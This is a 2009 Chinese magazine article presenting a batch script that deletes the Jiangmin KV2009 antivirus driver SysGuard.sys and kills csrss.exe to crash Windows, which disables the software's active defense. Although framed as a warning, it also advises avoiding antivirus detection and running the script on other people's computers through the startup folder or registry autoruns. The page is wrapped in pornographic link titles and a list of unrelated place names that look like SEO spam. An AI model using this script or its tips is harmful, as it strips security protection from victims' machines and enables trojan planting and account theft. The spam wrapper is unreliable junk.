• 
    

    
    

      99热精品在线国产_美女午夜性视频免费_国产精品国产高清国产av_av欧美777_自拍偷自拍亚洲精品老妇_亚洲熟女精品中文字幕_www日本黄色视频网_国产精品野战在线观看 ?

      批處理挑戰(zhàn)KV2009主動防御

      2009-04-29 00:44:03牧馬人
      計算機應(yīng)用文摘 2009年19期
      關(guān)鍵詞:主動防御批處理死機

      牧馬人

      現(xiàn)在主動防御功能實在是太火了,所以很多殺毒軟件都加入了這個功能,江民KV系列的殺毒軟件當然也不例外。但是,利用文本編輯軟件新建一個*.bat批處理文件,輸入下面這段代碼后保存并運行,就可以輕松干掉江民殺毒軟件KV2009的主動防御功能了(如圖)。

      @echo off

      del %systemroot%system32driversSysGuard.sys /f /q /s

      set app_name=csrss.exe

      echo 查找進程%app_name%,準備死機...

      (tasklist /nh | findstr /i %app_name%) || (goto dead)

      :dead

      ntsd -c -q -pn %app_name%

      我在虛擬機和本地系統(tǒng)中分別進行了試驗,發(fā)現(xiàn)這段代碼非常管用。它的意思非常簡單:首先是刪除江民殺毒軟件中的一個驅(qū)動文件,接著強制結(jié)束一個系統(tǒng)文件的進程,造成操作系統(tǒng)死機(之所以要強制死機,是因為殺毒軟件的自我保護功能不允許系統(tǒng)非正常地重新啟動)。當重新啟動后,江民殺毒軟件的主動防御功能就失效了,這樣黑客就能比較容易地向用戶的電腦中植入木馬、竊取賬號……

      如果你是江民殺毒軟件的用戶,那么此招不得不防,最好經(jīng)常檢查其主動防御功能的工作狀態(tài),不然電腦被黑客入侵了都還不知道。

      1.在試驗前,一定要把江民殺毒軟件的SysGuard.sys驅(qū)動文件拷貝到其他地方進行備份。因為如果試驗成功了,那么江民殺毒軟件的主動防御功能就徹底失效了,要想讓它恢復就得把備份的SysGuard.sys驅(qū)動文件拷貝回去,再重新啟動。

      2.最好不要把*.bat放在可執(zhí)行文件里,因為這樣在運行時十有八九會被殺毒軟件攔截。

      3.在別人的電腦上進行試驗時,可把*.bat放在啟動文件夾中,或采用修改注冊表的方式讓它自動運行。

      猜你喜歡
      主動防御批處理死機
      主動防御撞擊地球的“殺手”
      電腦死機時在干什么
      電腦報(2022年49期)2023-01-01 03:42:10
      提醒
      主動防御飛行器的范數(shù)型微分對策制導律
      網(wǎng)絡(luò)安全主動防御技術(shù)分析
      臉死機了
      基于PSD-BPA的暫態(tài)穩(wěn)定控制批處理計算方法的實現(xiàn)
      淺析HIPS系統(tǒng)防火墻技術(shù)與發(fā)展
      批處理天地.文件分類超輕松
      批處理天地.批量為文件更名(續(xù))
      荔波县| 自治县| 饶平县| 宣汉县| 高邮市| 嘉鱼县| 大悟县| 阳信县| 同德县| 浮山县| 呼玛县| 新绛县| 宿州市| 安福县| 唐河县| 丽江市| 万宁市| 长治县| 西青区| 克山县| 登封市| 苏尼特左旗| 巴中市| 通海县| 凤凰县| 荆州市| 景德镇市| 天镇县| 平昌县| 陈巴尔虎旗| 土默特左旗| 姜堰市| 墨竹工卡县| 前郭尔| 万年县| 宜昌市| 龙江县| 虎林市| 秦安县| 岳阳市| 江北区|